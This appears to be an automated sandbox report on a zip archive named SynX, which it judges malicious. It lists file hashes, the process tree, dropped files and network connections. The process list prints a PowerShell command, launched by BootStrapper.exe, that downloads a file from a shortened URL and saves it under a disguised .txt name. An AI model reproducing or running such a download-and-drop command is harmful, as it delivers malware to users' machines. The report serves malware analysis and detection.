File name: | SynX.zip |
Full analysis: | https://app.any.run/tasks/f59e9b1b-b0aa-43c1-a297-b1dc1c639b78 |
Verdict: | Malicious activity |
Analysis date: | May 14, 2019, 22:23:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v1.0 to extract |
MD5: | FB43EB87F2A5DF9C5C543539A14E9747 |
SHA1: | CA726E3D93AE4C4586C934FFBE4D723AD28604A9 |
SHA256: | B290BC27BC4A2698E30B19D53CA79B7E082E38597C702E5578E5C059B48F1338 |
SSDEEP: | 49152:+o/OREwNSSiHU3n4ga8Gki9XmT69nos4/M:Z/ORJcSXn4ga91mT69nJ2M |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | SynX/ |
---|---|
ZipUncompressedSize: | - |
ZipCompressedSize: | - |
ZipCRC: | 0x00000000 |
ZipModifyDate: | 2019:05:13 19:09:27 |
ZipCompression: | None |
ZipBitFlag: | - |
ZipRequiredVersion: | 10 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3164 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SynX.zip" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3564 | "C:\Users\admin\Desktop\SynX\BootStrapper.exe" | C:\Users\admin\Desktop\SynX\BootStrapper.exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM | ||||
2496 | "C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\D644.tmp\D645.tmp\D646.bat C:\Users\admin\Desktop\SynX\BootStrapper.exe" | C:\Windows\system32\cmd.exe | — | BootStrapper.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2756 | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://rebrand.ly/eonfsiudfhsiudfh', 'dfaoijf9weafd98asdfw9ae8sf.txt')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\dfaoijf9weafd98asdfw9ae8sf.txt | executable | |
MD5:AEA9AF5C06FE26BB7210362CB7D74DC0 | SHA256:7B7568D89D378F2E95A289EE8033A1C7D6ED572ED6ECBE66269F80EC2AF4A5F4 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\BootStrapper.exe | executable | |
MD5:B36F7CE4DA9E1632B424B9C4ED00D081 | SHA256:9CE4827401DB6974F5781E8E306DC1EBDC1C60E2230665EBC358021F0FCE71D1 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\globalf.txt | text | |
MD5:1700DF0210CDA593D3DF64F51B3CAAEA | SHA256:DEAE98F86C62749E4B642ACB41EA5DFCE0CAF09BC77036AAE82EE814A04ED9E0 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\fsharp\fsharp.js | text | |
MD5:DE122B3BC44A8714F386DC80282DCB12 | SHA256:1390079BABC117D3F376735780D98F409F317EB4628D17106642C6933EA1DA7F | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\bat\bat.js | text | |
MD5:4CB475399C4490EEA41982DCD6D9653E | SHA256:9BCA42394FE8922FEC24B768EEB8CE04692DE6FAD82F9052D5B7E70F5C6B0F40 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\coffee\coffee.js | text | |
MD5:9D0C4AC1691EED0A480C3E9246490D29 | SHA256:E706C9F8E5C5A0CB01B2F4E4879EC34A050D6EB2A8840284EB7BADD9D78099F9 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\go\go.js | text | |
MD5:5B4484C914CD97AFF4510B803F2517EF | SHA256:46D1757C3CD3DBC3C7B465A338880144922A1C34C30E36F06FF2DB8C2FF75B86 | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\base.txt | text | |
MD5:0D834904A252E1AB786F9637BEF6819F | SHA256:DBE440C5DEE6367EBCA919886FFE593246E1E52618E4713373000C9FC77C87CC | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\html\html.js | text | |
MD5:630FA41F59A189AED68B4DB82559DE95 | SHA256:C717AC0701D3B1E22DC52A0C53608214297E5FAB7BC7011CF4E964F2ECA9D62F | |||
3164 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\css\css.js | text | |
MD5:49AD30F1151CFD7A74677FDC6DD13DA9 | SHA256:BD331FD3BD2C37B0C3150035325F163AC9266BF6D942310764815E676D856D91 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2756 | powershell.exe | 34.206.134.255:443 | rebrand.ly | Amazon.com, Inc. | US | unknown |
— | — | 104.16.11.231:443 | cdn.discordapp.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
rebrand.ly |
| whitelisted |
cdn.discordapp.com |
| shared |